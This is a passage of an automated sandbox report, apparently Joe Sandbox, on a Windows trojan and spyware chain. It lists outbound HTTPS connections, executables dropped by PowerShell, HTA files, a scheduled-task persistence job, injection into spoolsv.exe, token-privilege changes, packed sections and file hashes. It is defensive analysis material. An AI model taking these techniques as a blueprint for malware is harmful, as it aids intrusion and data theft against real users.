                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49695 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49698 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49700 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49702 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49726 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49762 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49763 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49767 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49775 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49789 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49790 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49791 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:49792 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49793 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49796 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49804 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0097EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,34_2_0097EAFF
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0097ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,34_2_0097ED6A
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0097EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,34_2_0097EAFF
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0096AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,34_2_0096AA57
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00999576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,34_2_00999576

                      System Summary

                      barindex
                      Binary is likely a compiled AutoIt script file
                      Source: c6e8248d4e.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                      Source: c6e8248d4e.exe, 00000022.00000002.2110937860.00000000009C2000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4b0f2150-b
                      Source: c6e8248d4e.exe, 00000022.00000002.2110937860.00000000009C2000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3b793575-2
                      Creates HTA files
                      Source: C:\Windows\System32\cmd.exeFile created: C:\Temp\mtzRdqIHD.htaJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exeFile created: C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta
                      PE file contains section with special chars
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.drStatic PE information: section name:
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.drStatic PE information: section name: .idata
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.drStatic PE information: section name:
                      Source: rapes.exe.17.drStatic PE information: section name:
                      Source: rapes.exe.17.drStatic PE information: section name: .idata
                      Source: rapes.exe.17.drStatic PE information: section name:
                      Source: random[1].exe.28.drStatic PE information: section name:
                      Source: random[1].exe.28.drStatic PE information: section name: .idata
                      Source: 19be97887a.exe.28.drStatic PE information: section name:
                      Source: 19be97887a.exe.28.drStatic PE information: section name: .idata
                      Source: random[1].exe0.28.drStatic PE information: section name:
                      Source: random[1].exe0.28.drStatic PE information: section name: .idata
                      Source: random[1].exe0.28.drStatic PE information: section name:
                      Source: bb5ad48269.exe.28.drStatic PE information: section name:
                      Source: bb5ad48269.exe.28.drStatic PE information: section name: .idata
                      Source: bb5ad48269.exe.28.drStatic PE information: section name:
                      Source: random[1].exe2.28.drStatic PE information: section name:
                      Source: random[1].exe2.28.drStatic PE information: section name: .idata
                      Source: ab5415a7b5.exe.28.drStatic PE information: section name:
                      Source: ab5415a7b5.exe.28.drStatic PE information: section name: .idata
                      Source: random[2].exe0.28.drStatic PE information: section name:
                      Source: random[2].exe0.28.drStatic PE information: section name: .idata
                      Source: 60eb3ded99.exe.28.drStatic PE information: section name:
                      Source: 60eb3ded99.exe.28.drStatic PE information: section name: .idata
                      Source: D51OAO8D0TVNMCQXHC.exe.30.drStatic PE information: section name:
                      Source: D51OAO8D0TVNMCQXHC.exe.30.drStatic PE information: section name: .idata
                      Source: D51OAO8D0TVNMCQXHC.exe.30.drStatic PE information: section name:
                      Powershell drops PE file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637AB2C94 NtFreeVirtualMemory,29_2_0000017637AB2C94
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637AB2B78 NtAllocateVirtualMemory,29_2_0000017637AB2B78
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C1C220 NtQueryInformationProcess,29_2_0000017637C1C220
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C1C040 VirtualAlloc,NtCreateThreadEx,VirtualFree,29_2_0000017637C1C040
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C1C800 NtQuerySystemInformation,NtQuerySystemInformation,29_2_0000017637C1C800
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C1C570 NtWriteVirtualMemory,29_2_0000017637C1C570
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C1C440 NtAllocateVirtualMemory,29_2_0000017637C1C440
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C1C360 NtQueryInformationProcess,29_2_0000017637C1C360
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_015A1C94 NtFreeVirtualMemory,31_2_015A1C94
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_015A1B78 NtAllocateVirtualMemory,31_2_015A1B78
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_0180C800 NtQuerySystemInformation,NtQuerySystemInformation,31_2_0180C800
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_0180C040 VirtualAlloc,NtCreateThreadEx,NtClose,VirtualFree,31_2_0180C040
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_017F4B0C VirtualAlloc,NtReadVirtualMemory,VirtualFree,31_2_017F4B0C
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_0180C360 NtQueryInformationProcess,31_2_0180C360
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA22D0: GetTickCount64,SetLastError,DeviceIoControl,IsDebuggerPresent,29_2_00007FF7C9CA22D0
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00961201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,34_2_00961201
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0096E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,34_2_0096E8F6
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile created: C:\Windows\Tasks\rapes.jobJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF9365E3CF212_2_00007FF9365E3CF2
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_004361F028_2_004361F0
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_0043B70028_2_0043B700
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_0047404728_2_00474047
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_004718D728_2_004718D7
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_004351A028_2_004351A0
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_0043CC4028_2_0043CC40
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_0043545028_2_00435450
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_00462C2028_2_00462C20
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_0045B4C028_2_0045B4C0
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_00475CD428_2_00475CD4
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_00475DF428_2_00475DF4
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_0045F6DB28_2_0045F6DB
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_00434EF028_2_00434EF0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA1EB029_2_00007FF7C9CA1EB0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA22D029_2_00007FF7C9CA22D0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA527029_2_00007FF7C9CA5270
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA163029_2_00007FF7C9CA1630
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA31E029_2_00007FF7C9CA31E0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA2A0029_2_00007FF7C9CA2A00
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA260029_2_00007FF7C9CA2600
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA560029_2_00007FF7C9CA5600
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA3BC029_2_00007FF7C9CA3BC0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA99E829_2_00007FF7C9CA99E8
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA85D029_2_00007FF7C9CA85D0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CB006829_2_00007FF7C9CB0068
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CAE05829_2_00007FF7C9CAE058
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA9BF429_2_00007FF7C9CA9BF4
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA100029_2_00007FF7C9CA1000
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C028E029_2_0000017637C028E0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C0DA9029_2_0000017637C0DA90
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C021D029_2_0000017637C021D0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C111B029_2_0000017637C111B0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C2C84029_2_0000017637C2C840
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C177C029_2_0000017637C177C0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C3679829_2_0000017637C36798
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C0DE8029_2_0000017637C0DE80
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C32E8829_2_0000017637C32E88
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C0D6B029_2_0000017637C0D6B0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C3FE5429_2_0000017637C3FE54
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C32C0C29_2_0000017637C32C0C
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C0E41029_2_0000017637C0E410
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C0EC2029_2_0000017637C0EC20
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C112C029_2_0000017637C112C0
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_017F21D031_2_017F21D0
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_0181C85E31_2_0181C85E
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_017FDA9031_2_017FDA90
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_017FEC2031_2_017FEC20
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_017FE41031_2_017FE410
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_01822C0C31_2_01822C0C
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_0182679831_2_01826798
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_018077C031_2_018077C0
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_01822E8831_2_01822E88
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_017FD6B031_2_017FD6B0
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_017FDE8031_2_017FDE80
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0097204634_2_00972046
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0090806034_2_00908060
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0096829834_2_00968298
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0093E4FF34_2_0093E4FF
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0093676B34_2_0093676B
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0099487334_2_00994873
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0092CAA034_2_0092CAA0
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0090CAF034_2_0090CAF0
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0091CC3934_2_0091CC39
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00936DD934_2_00936DD9
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009091C034_2_009091C0
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0091B11934_2_0091B119
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0092139434_2_00921394
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0092170634_2_00921706
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0092781B34_2_0092781B
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009219B034_2_009219B0
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0090792034_2_00907920
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0091997D34_2_0091997D
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00927A4A34_2_00927A4A
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00927CA734_2_00927CA7
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00921C7734_2_00921C77
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00939EEE34_2_00939EEE
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0098BE4434_2_0098BE44
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00921F3234_2_00921F32
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe 13F0C9496830B18ABC8851E31DD47A06A1FA6A192B2D1108ABFCE077292CEEC9
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe 54026C140022D26B76E4116CE5502F722947E564871C31B9646714611AA6387F
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: String function: 00920A30 appears 46 times
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: String function: 0091F9F2 appears 40 times
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.drStatic PE information: Section: ZLIB complexity 0.9988969955234159
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.drStatic PE information: Section: rrnnqshc ZLIB complexity 0.9943995996707573
                      Source: rapes.exe.17.drStatic PE information: Section: ZLIB complexity 0.9988969955234159
                      Source: rapes.exe.17.drStatic PE information: Section: rrnnqshc ZLIB complexity 0.9943995996707573
                      Source: random[1].exe0.28.drStatic PE information: Section: zwvttbmt ZLIB complexity 0.994723938808185
                      Source: bb5ad48269.exe.28.drStatic PE information: Section: zwvttbmt ZLIB complexity 0.994723938808185
                      Source: random[2].exe0.28.drStatic PE information: Section: ZLIB complexity 0.9988962950138505
                      Source: 60eb3ded99.exe.28.drStatic PE information: Section: ZLIB complexity 0.9988962950138505
                      Source: D51OAO8D0TVNMCQXHC.exe.30.drStatic PE information: Section: ZLIB complexity 0.9977778495179064
                      Source: D51OAO8D0TVNMCQXHC.exe.30.drStatic PE information: Section: boxephyl ZLIB complexity 0.9941974155050959
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                      Source: rapes.exe.17.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                      Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winBAT@108/57@64/8
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009737B5 GetLastError,FormatMessageW,34_2_009737B5
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C03A7C GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,29_2_0000017637C03A7C
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C19000 AdjustTokenPrivileges,29_2_0000017637C19000
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_017F3A7C GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,31_2_017F3A7C
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009610BF AdjustTokenPrivileges,CloseHandle,34_2_009610BF
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009616C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,34_2_009616C3
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009751CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,34_2_009751CD
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C03FD4 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,29_2_0000017637C03FD4
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_0181C85E CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,CoUninitialize,31_2_0181C85E
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA3BC0 GetLastError,SetLastError,SetLastError,SetLastError,SetLastError,SwitchToThread,SetLastError,GetCommandLineW,AreFileApisANSI,lstrlenA,StrStrA,SHTestTokenMembership,GetModuleHandleExW,FindResourceW,LoadResource,LockResource,SizeofResource,GlobalAlloc,VirtualAlloc,SleepEx,ExitProcess,29_2_00007FF7C9CA3BC0
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\2qv26zF[1].exe
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3816:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeMutant created: NULL
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeMutant created: \Sessions\1\BaseNamedObjects\Global\C831DBB2DBB2C831157BF6047F15F806
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
                      Source: C:\Windows\System32\spoolsv.exeMutant created: \BaseNamedObjects\Global\C831D4C7D4C7C8311A0EF6040A1AF806
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5124:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4700:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2892:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_03
